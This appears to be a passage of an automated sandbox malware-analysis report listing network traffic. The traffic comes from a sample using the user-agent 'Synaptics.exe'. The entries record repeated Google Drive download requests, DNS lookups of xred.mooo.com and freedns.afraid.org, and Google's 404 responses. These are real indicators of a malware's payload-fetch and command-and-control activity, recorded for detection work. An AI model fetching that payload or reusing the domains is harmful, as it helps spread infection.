                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=GPEyRES6dnqa1PybEf1Rr9o_i-ytwRPdlTGDsBasGkkG7RhcjgUsndoApuB8EFNTU4HfwbwCVTZagBwpmXuTfOxEIZiwWE3n4rVZtzJ2p6IAeB8jqavW6Dh651yVrmDwcr9snCEqzJWtRpfMyr4oe6sqzmlW9VHeMOaKogqkwadCM0pdyCAi9g-8
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=GPEyRES6dnqa1PybEf1Rr9o_i-ytwRPdlTGDsBasGkkG7RhcjgUsndoApuB8EFNTU4HfwbwCVTZagBwpmXuTfOxEIZiwWE3n4rVZtzJ2p6IAeB8jqavW6Dh651yVrmDwcr9snCEqzJWtRpfMyr4oe6sqzmlW9VHeMOaKogqkwadCM0pdyCAi9g-8
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KO29nQ3BoH9z9rIHYq_AE_sQZZkity_O8wgVZicUTn8OVV4nhbnGHMoMHoe2Ek83cgjFEKUQU70cKZWsU7BTOruMh9wf9FtiSIM974Z6xD_1WCWVXeY2OfzDItv1dKCgY7a2aOgWsxmGEFpBx9437BSTZ06oxcM3-tt0XXMypP_g7n7FWe32Z78
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KO29nQ3BoH9z9rIHYq_AE_sQZZkity_O8wgVZicUTn8OVV4nhbnGHMoMHoe2Ek83cgjFEKUQU70cKZWsU7BTOruMh9wf9FtiSIM974Z6xD_1WCWVXeY2OfzDItv1dKCgY7a2aOgWsxmGEFpBx9437BSTZ06oxcM3-tt0XXMypP_g7n7FWe32Z78
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KO29nQ3BoH9z9rIHYq_AE_sQZZkity_O8wgVZicUTn8OVV4nhbnGHMoMHoe2Ek83cgjFEKUQU70cKZWsU7BTOruMh9wf9FtiSIM974Z6xD_1WCWVXeY2OfzDItv1dKCgY7a2aOgWsxmGEFpBx9437BSTZ06oxcM3-tt0XXMypP_g7n7FWe32Z78
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KO29nQ3BoH9z9rIHYq_AE_sQZZkity_O8wgVZicUTn8OVV4nhbnGHMoMHoe2Ek83cgjFEKUQU70cKZWsU7BTOruMh9wf9FtiSIM974Z6xD_1WCWVXeY2OfzDItv1dKCgY7a2aOgWsxmGEFpBx9437BSTZ06oxcM3-tt0XXMypP_g7n7FWe32Z78
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KO29nQ3BoH9z9rIHYq_AE_sQZZkity_O8wgVZicUTn8OVV4nhbnGHMoMHoe2Ek83cgjFEKUQU70cKZWsU7BTOruMh9wf9FtiSIM974Z6xD_1WCWVXeY2OfzDItv1dKCgY7a2aOgWsxmGEFpBx9437BSTZ06oxcM3-tt0XXMypP_g7n7FWe32Z78
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KO29nQ3BoH9z9rIHYq_AE_sQZZkity_O8wgVZicUTn8OVV4nhbnGHMoMHoe2Ek83cgjFEKUQU70cKZWsU7BTOruMh9wf9FtiSIM974Z6xD_1WCWVXeY2OfzDItv1dKCgY7a2aOgWsxmGEFpBx9437BSTZ06oxcM3-tt0XXMypP_g7n7FWe32Z78
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KO29nQ3BoH9z9rIHYq_AE_sQZZkity_O8wgVZicUTn8OVV4nhbnGHMoMHoe2Ek83cgjFEKUQU70cKZWsU7BTOruMh9wf9FtiSIM974Z6xD_1WCWVXeY2OfzDItv1dKCgY7a2aOgWsxmGEFpBx9437BSTZ06oxcM3-tt0XXMypP_g7n7FWe32Z78
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=i1tMKc6yLjj--7fan0rbLuRCWLfoAgwT3UT9WfUdnlJhpTvE_QyvzKFQpziQUyRFjIPk3RQf0aV54pT7PcIsKeGo8DNIeXtzNpkR3_xuIuxZ4zbg2pSE3qBkLS7ye7gITU8qVAEvbdLRrA4Aa9dGuCsdu7cX7sY-f4c_h-DCw4m1pFS549dDf4B5
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=i1tMKc6yLjj--7fan0rbLuRCWLfoAgwT3UT9WfUdnlJhpTvE_QyvzKFQpziQUyRFjIPk3RQf0aV54pT7PcIsKeGo8DNIeXtzNpkR3_xuIuxZ4zbg2pSE3qBkLS7ye7gITU8qVAEvbdLRrA4Aa9dGuCsdu7cX7sY-f4c_h-DCw4m1pFS549dDf4B5
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KO29nQ3BoH9z9rIHYq_AE_sQZZkity_O8wgVZicUTn8OVV4nhbnGHMoMHoe2Ek83cgjFEKUQU70cKZWsU7BTOruMh9wf9FtiSIM974Z6xD_1WCWVXeY2OfzDItv1dKCgY7a2aOgWsxmGEFpBx9437BSTZ06oxcM3-tt0XXMypP_g7n7FWe32Z78
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=GPEyRES6dnqa1PybEf1Rr9o_i-ytwRPdlTGDsBasGkkG7RhcjgUsndoApuB8EFNTU4HfwbwCVTZagBwpmXuTfOxEIZiwWE3n4rVZtzJ2p6IAeB8jqavW6Dh651yVrmDwcr9snCEqzJWtRpfMyr4oe6sqzmlW9VHeMOaKogqkwadCM0pdyCAi9g-8
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=GPEyRES6dnqa1PybEf1Rr9o_i-ytwRPdlTGDsBasGkkG7RhcjgUsndoApuB8EFNTU4HfwbwCVTZagBwpmXuTfOxEIZiwWE3n4rVZtzJ2p6IAeB8jqavW6Dh651yVrmDwcr9snCEqzJWtRpfMyr4oe6sqzmlW9VHeMOaKogqkwadCM0pdyCAi9g-8
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KO29nQ3BoH9z9rIHYq_AE_sQZZkity_O8wgVZicUTn8OVV4nhbnGHMoMHoe2Ek83cgjFEKUQU70cKZWsU7BTOruMh9wf9FtiSIM974Z6xD_1WCWVXeY2OfzDItv1dKCgY7a2aOgWsxmGEFpBx9437BSTZ06oxcM3-tt0XXMypP_g7n7FWe32Z78
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KO29nQ3BoH9z9rIHYq_AE_sQZZkity_O8wgVZicUTn8OVV4nhbnGHMoMHoe2Ek83cgjFEKUQU70cKZWsU7BTOruMh9wf9FtiSIM974Z6xD_1WCWVXeY2OfzDItv1dKCgY7a2aOgWsxmGEFpBx9437BSTZ06oxcM3-tt0XXMypP_g7n7FWe32Z78
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=GPEyRES6dnqa1PybEf1Rr9o_i-ytwRPdlTGDsBasGkkG7RhcjgUsndoApuB8EFNTU4HfwbwCVTZagBwpmXuTfOxEIZiwWE3n4rVZtzJ2p6IAeB8jqavW6Dh651yVrmDwcr9snCEqzJWtRpfMyr4oe6sqzmlW9VHeMOaKogqkwadCM0pdyCAi9g-8
                              Source: global trafficHTTP traffic detected: GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1User-Agent: MyAppHost: freedns.afraid.orgCache-Control: no-cache
                              Source: global trafficDNS traffic detected: DNS query: docs.google.com
                              Source: global trafficDNS traffic detected: DNS query: xred.mooo.com
                              Source: global trafficDNS traffic detected: DNS query: freedns.afraid.org
                              Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4Abtg2ITdHLlXhLkFQzK74zzYUN73qoq7aMNRJ8howqASwprWyEbv_N4ONIZofelFsContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 07 Jan 2025 12:18:29 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-4jtpZ9yD2N_-NK5Jmf0TPA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=i1tMKc6yLjj--7fan0rbLuRCWLfoAgwT3UT9WfUdnlJhpTvE_QyvzKFQpziQUyRFjIPk3RQf0aV54pT7PcIsKeGo8DNIeXtzNpkR3_xuIuxZ4zbg2pSE3qBkLS7ye7gITU8qVAEvbdLRrA4Aa9dGuCsdu7cX7sY-f4c_h-DCw4m1pFS549dDf4B5; expires=Wed, 09-Jul-2025 12:18:29 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7R0MHyI5-6VfOQ8N3LdPxjeM0PTUTztLgxZ1AtA9uGXHGr4M7h4x_ty95ZKhuG4vaxContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 07 Jan 2025 12:18:29 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Cross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-eQiJQVd2AWJm0bvM7bOWVg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerSet-Cookie: NID=520=GPEyRES6dnqa1PybEf1Rr9o_i-ytwRPdlTGDsBasGkkG7RhcjgUsndoApuB8EFNTU4HfwbwCVTZagBwpmXuTfOxEIZiwWE3n4rVZtzJ2p6IAeB8jqavW6Dh651yVrmDwcr9snCEqzJWtRpfMyr4oe6sqzmlW9VHeMOaKogqkwadCM0pdyCAi9g-8; expires=Wed, 09-Jul-2025 12:18:29 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4HvbgaPcPZwvwbSH0JyG-2ToaNzLwNUPjMb_OFik7n-Kqzn5feggn2Ja3Nl0d5NQ9IContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 07 Jan 2025 12:18:31 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce--ScSs8qvgEakHWCB_SQdIg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=SZhc7KpC7T7X_R4yEGnNU40kjC7yz3C4_NBUvYTPUWKiYXDIuLwZpAjOF9ocrn4ar2j4bV1J2f0z3dlz4oDnOYNQzR2bwN6GOOAoebYHKlpySm8FUhpfYjo16rCBD_LjcVUQ4yLvGq3_XMw82uBZLD38OBwjWCHX9Fm9FxeZdjzftFSo6zxSzx80; expires=Wed, 09-Jul-2025 12:18:31 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5GgQF2kF1bSGzLdPsMNxWyfTc0pkL-XydrrNDxFxvD68OmlCsdo-Fc0vAdUY2LyXnsContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 07 Jan 2025 12:18:31 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-TDErWUJAIv-7IC3AOr6Uww' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=KO29nQ3BoH9z9rIHYq_AE_sQZZkity_O8wgVZicUTn8OVV4nhbnGHMoMHoe2Ek83cgjFEKUQU70cKZWsU7BTOruMh9wf9FtiSIM974Z6xD_1WCWVXeY2OfzDItv1dKCgY7a2aOgWsxmGEFpBx9437BSTZ06oxcM3-tt0XXMypP_g7n7FWe32Z78; expires=Wed, 09-Jul-2025 12:18:31 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7spNP93ghvaesPcubp1zMAP3_n3Co983-BhJ5agm3hiiFzyNyFa9FqrcrXbV3oN-9xContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 07 Jan 2025 12:18:32 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-EGWS5ndX-zRBe0YR_jXpKQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4uOV_xL7N__W0nzr3nEyPDSdUUsE2KJJHCLBfnFC6E1BpqeU0LGSykG8uV7ZOTM6L1Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 07 Jan 2025 12:18:32 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-pMHi68RNn49_7_43Az5uGg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4gW5qOzUKXqTTCjeQ9wP6y6xgQKpAZkIM6Tf_6Zi7Nqxir_6iS-NhQks6DFi9jBE9mContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 07 Jan 2025 12:18:34 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-x90EqjtfPlIiA3yQNuK8rw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6cEp6pFPNl5Xa7sbX8jQxMNVDdyuC69z5W4yvVkqeGgtUDzo61WRggM6v2LE6QA2WJ12ccfLgContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 07 Jan 2025 12:18:34 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-S35fU7U-5pXkSAM-iMVRkA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6F5WUlqGPCruTCsSnHqN7pRQmYRRKqHFApds3eZOlrduui5CHpVseprB0EFMJGzi46Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 07 Jan 2025 12:18:36 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 